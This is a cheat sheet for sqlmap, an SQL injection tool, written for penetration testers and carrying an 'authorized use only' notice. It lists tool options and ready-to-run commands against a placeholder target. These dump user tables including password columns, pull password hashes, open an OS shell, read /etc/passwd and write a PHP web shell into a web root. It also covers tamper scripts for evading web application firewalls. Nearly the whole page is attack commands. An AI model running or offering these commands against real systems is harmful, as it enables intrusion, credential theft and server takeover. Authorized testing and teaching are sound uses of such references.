← All cheat sheets

SQLMAP

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

BASIC USAGE#

sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T table --dump

TARGET OPTIONS#

-u URL                        Target URL with parameter
-d CONN                       Direct database connection string
-l LOGFILE                    Parse targets from Burp/WebScarab log
-m BULKFILE                   Parse targets from file (one per line)
-r REQUESTFILE                Load HTTP request from file
-g GOOGLEDORK                 Process Google dork results
--data=DATA                   POST data string
--cookie=COOKIE               HTTP Cookie header
--host=HOST                   HTTP Host header
--referer=REFERER             HTTP Referer header
-H HEADER                     Extra HTTP header
--headers=HEADERS             Extra HTTP headers (file)
--auth-type=AUTH              HTTP auth type (Basic, Digest, NTLM)
--auth-cred=CRED              HTTP auth credentials (user:pass)
--proxy=PROXY                 Use proxy (http://host:port)
--tor                         Use Tor network

REQUEST OPTIONS#

--method=METHOD               HTTP method (GET, POST, PUT)
--param-del=CHAR              Parameter delimiter character
--chunked                     Use HTTP chunked encoding
--random-agent                Use random User-Agent
--user-agent=UA               Set User-Agent header
--delay=DELAY                 Delay between requests (seconds)
--timeout=TIMEOUT             Connection timeout (default 30)
--retries=RETRIES             Retries on timeout (default 3)
--safe-url=URL                URL to visit between requests
--safe-freq=FREQ              Requests between safe URL visits

INJECTION OPTIONS#

-p PARAM                      Testable parameter(s)
--skip=SKIP                   Skip testing for parameters
--dbms=DBMS                   Force DBMS (MySQL, PostgreSQL, MSSQL, Oracle)
--prefix=PREFIX               Injection payload prefix
--suffix=SUFFIX               Injection payload suffix
--tamper=TAMPER               Use tamper scripts

DETECTION OPTIONS#

--level=LEVEL                 Level of tests (1-5, default 1)
--risk=RISK                   Risk of tests (1-3, default 1)
--string=STRING               String to match for True
--not-string=STRING           String to match for False
--regexp=REGEXP               Regex to match for True
--code=CODE                   HTTP code to match for True
--text-only                   Compare pages based on text only
--titles                      Compare pages based on titles

TECHNIQUES#

--technique=TECH              SQL injection techniques to use
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries

# Examples
--technique=BEU               Boolean, Error, Union
--technique=T                 Time-based only

ENUMERATION#

--all                         Retrieve everything
-b, --banner                  DBMS banner
--current-user                Current DBMS user
--current-db                  Current database
--hostname                    Server hostname
--is-dba                      Is current user DBA?
--users                       DBMS users
--passwords                   DBMS users password hashes
--privileges                  DBMS users privileges
--roles                       DBMS users roles
--dbs                         Available databases
--tables                      Tables in database
--columns                     Columns in table
--schema                      Database schema
--count                       Number of entries
--dump                        Dump table entries
--dump-all                    Dump all tables
-D DB                         Database to enumerate
-T TBL                        Table to enumerate
-C COL                        Column to enumerate
--start=FIRST                 First entry to retrieve
--stop=LAST                   Last entry to retrieve
--where=CONDITION             WHERE condition

FILE SYSTEM#

--file-read=FILE              Read file from server
--file-write=LOCAL            Local file to write to server
--file-dest=DEST              Server path to write to

OS ACCESS#

--os-cmd=CMD                  Execute OS command
--os-shell                    Interactive OS shell
--os-pwn                      OOB shell, Meterpreter, VNC

DATABASE COMMANDS#

--sql-query=QUERY             Execute SQL statement
--sql-shell                   Interactive SQL shell
--sql-file=FILE               Execute SQL from file

FINGERPRINTING#

-f, --fingerprint             Extensive DBMS fingerprint

OUTPUT#

-v LEVEL                      Verbosity level (0-6)
-o                            Turn on all optimization switches
--batch                       Non-interactive mode
--output-dir=DIR              Output directory
--forms                       Parse and test forms
--crawl=DEPTH                 Crawl starting from target URL

PRACTICAL EXAMPLES#

# Basic GET parameter test
sqlmap -u "http://target.com/page.php?id=1"

# POST request
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test"

# From Burp request file
sqlmap -r request.txt

# With authentication
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123"

# Enumerate databases
sqlmap -u "http://target.com/page?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

# Enumerate columns
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --columns

# Dump table
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

# Dump specific columns
sqlmap -u "http://target.com/page?id=1" -D db -T users -C username,password --dump

# Get OS shell
sqlmap -u "http://target.com/page?id=1" --os-shell

# Read file
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd"

# Write file
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# SQL shell
sqlmap -u "http://target.com/page?id=1" --sql-shell

WAF BYPASS (TAMPER SCRIPTS)#

sqlmap -u "http://target.com/page?id=1" --tamper=space2comment
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase
sqlmap -u "http://target.com/page?id=1" --tamper=charencode

# Common tamper scripts:
apostrophemask          Replace apostrophe with UTF-8
apostrophenullencode    Replace apostrophe with illegal unicode
appendnullbyte          Append null byte
base64encode            Base64 encode
between                 Replace > with NOT BETWEEN
charencode              URL-encode all characters
charunicodeencode       Unicode-URL-encode
commalessmid            Use MID() without comma
equaltolike             Replace = with LIKE
greatest                Replace > with GREATEST
modsecurityversioned    Version comment for ModSecurity
multiplespaces          Add multiple spaces
nonrecursivereplacement Bypass non-recursive str_replace
percentage              Add % to each character
randomcase              Random case
securesphere            Imperva SecureSphere bypass
space2comment           Replace space with /**/
space2plus              Replace space with +
space2randomblank       Replace space with random blank
unionalltounion         Replace UNION ALL with UNION
unmagicquotes           Replace quotes with multi-byte

OPTIMIZATION#

-o                            Enable all optimizations
--threads=THREADS             Max concurrent requests (default 1)
--predict-output              Predict query output
--keep-alive                  Use persistent HTTP(s) connections
--null-connection             Get page length without body
--eta                         Display ETA for each output

MISC OPTIONS#

--batch                       Never ask for user input
--wizard                      Simple wizard interface
--update                      Update sqlmap
--purge                       Remove all sqlmap data
--dependencies                Check for missing dependencies
--identify-waf                Identify WAF/IPS
--skip-waf                    Skip WAF/IPS heuristic detection
--mobile                      Use mobile User-Agent
--check-internet              Check internet connection

DBMS-SPECIFIC#

# MySQL
--dbms=mysql

# PostgreSQL
--dbms=postgresql

# Microsoft SQL Server
--dbms=mssql

# Oracle
--dbms=oracle

# SQLite
--dbms=sqlite

TYPICAL WORKFLOW#

1. Test for vulnerability
   sqlmap -u "URL" --batch

2. Enumerate databases
   sqlmap -u "URL" --dbs

3. Enumerate tables
   sqlmap -u "URL" -D dbname --tables

4. Enumerate columns
   sqlmap -u "URL" -D dbname -T tablename --columns

5. Dump data
   sqlmap -u "URL" -D dbname -T tablename --dump